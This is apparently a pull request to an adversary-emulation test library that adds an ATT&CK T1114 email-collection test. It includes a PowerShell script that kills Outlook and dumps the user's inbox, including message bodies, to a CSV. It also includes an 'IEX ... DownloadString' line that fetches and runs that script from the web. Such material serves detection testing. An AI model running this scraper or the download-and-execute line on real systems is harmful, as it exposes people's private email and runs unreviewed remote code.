### PR TITLE
Add test for T1114 that extracts emails from Microsoft Outlook

### DIFF
--- a/atomics/T1114/Get-Inbox.ps1
+++ b/atomics/T1114/Get-Inbox.ps1
@@ -1,0 +1,61 @@
+<#
+.SYNOPSIS
+    
+    Scrapes message data from the inbox of the current user and stores data in 'mail.csv' in the directory where the scrip was executed
+    
+    Outlook Email Collection
+    MITRE ATT&CK - T1114
+    Author: Greg Foss (@heinzarelli)
+    Date: February, 2019
+    License: BSD 3-Clause
+
+.EXAMPLE
+
+    Display email contents in the terminal    
+    PS C:\> .\Get-Inbox.ps1
+
+    Write emails out to a CSV
+    PS C:\> .\Get-Inbox.ps1 -file "mail.csv"
+#>
+
+[CmdLetBinding()]
+param( [string]$file )
+
+function Kill-Outlook {
+
+    # Check to see if outlook is running, and close it to scrape mail data programmatically
+    $outlook = Get-Process -Name Outlook -ErrorAction SilentlyContinue
+    if ($outlook) {
+        $outlook.CloseMainWindow()
+        Sleep 5
+        if (!$outlook.HasExited) {
+            $outlook | Stop-Process -Force > $null
+        }
+    }
+    Remove-Variable outlook > $null
+}
+
+function Scrape-Outlook {
+
+    # Connect to the local outlook inbox and read mail
+    Add-type -assembly "Microsoft.Office.Interop.Outlook" | out-null
+    $olFolders = "Microsoft.Office.Interop.Outlook.olDefaultFolders" -as [type]
+    $inbox = new-object -comobject outlook.application
+    $namespace = $inbox.GetNameSpace("MAPI")
+    $folder = $namespace.getDefaultFolder($olFolders::olFolderInBox)
+    Write-Output "Please be patient, this may take some time..."
+    
+    # Output the data
+    if ( $file ) {
+        $folder.items |
+        Select-Object -Property Subject, ReceivedTime, SenderName, ReceivedByName, Body |
+        Export-Csv -Path $file
+    } else {
+        $folder.items |
+        Select-Object -Property Subject, ReceivedTime, SenderName, ReceivedByName
+    }
+}
+
+Kill-Outlook > $null
+Scrape-Outlook
+Kill-Outlook > $null

--- a/atomics/T1114/T1114.md
+++ b/atomics/T1114/T1114.md
@@ -1,0 +1,35 @@
+# T1114 - Email Collection
+## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1114)
+<blockquote>Adversaries may target user email to collect sensitive information from a target.
+
+Files containing email data can be acquired from a user's system, such as Outlook storage or cache files .pst and .ost.
+
+Adversaries may leverage a user's credentials and interact directly with the Exchange server to acquire information from within a network.
+
+Some adversaries may acquire user credentials and access externally facing webmail applications, such as Outlook Web Access.</blockquote>
+
+## Atomic Tests
+
+- [Atomic Test #1 - T1114 Email Collection with PowerShell](#atomic-test-1---t1114-email-collection-with-powershell)
+
+
+<br/>
+
+## Atomic Test #1 - T1114 Email Collection with PowerShell
+Search through local Outlook installation, extract mail, compress the contents, and saves everything to a directory for later exfiltration.
+
+**Supported Platforms:** Windows
+
+
+#### Run it with `command_prompt`!
+```
+Display email contents in the terminal
+  PS C:\> .\Get-Inbox.ps1
+
+Write emails out to a CSV
+  PS C:\> .\Get-Inbox.ps1 -file "mail.csv"
+
+Download and Execute
+  "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/ARTifacts/Misc/Get-Inbox.ps1')"
+```
+<br/>

--- a/atomics/T1114/T1114.yaml
+++ b/atomics/T1114/T1114.yaml
@@ -1,0 +1,25 @@
+---
+attack_technique: T1114
+display_name: Email Collection
+attack_link: https://attack.mitre.org/wiki/Technique/T1114
+
+atomic_tests:
+- name: T1114 Email Collection with PowerShell
+
+  description: |
+    Search through local Outlook installation, extract mail, compress the contents, and saves everything to a directory for later exfiltration.
+  
+  supported_platforms:
+    - windows
+  
+  executor:
+    name: command_prompt
+    command: |
+      Display email contents in the terminal
+        PS C:\> .\Get-Inbox.ps1
+
+      Write emails out to a CSV
+        PS C:\> .\Get-Inbox.ps1 -file "mail.csv"
+      
+      Download and Execute
+        "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/ARTifacts/Misc/Get-Inbox.ps1')"


### PR DESCRIPTION
**Details:**
This test simulates an attacker extracting email data from the currently logged in user's Microsoft Outlook instance. This data can be displayed in the terminal, or extracted to a file for later exfiltration. In a real scenario, the script could be improved to include search functionality and attachment extraction.

**Testing:**
This has been tested on a Windows 10 installation with Microsoft Outlook installed and configured.

**Associated Issues:**
N/A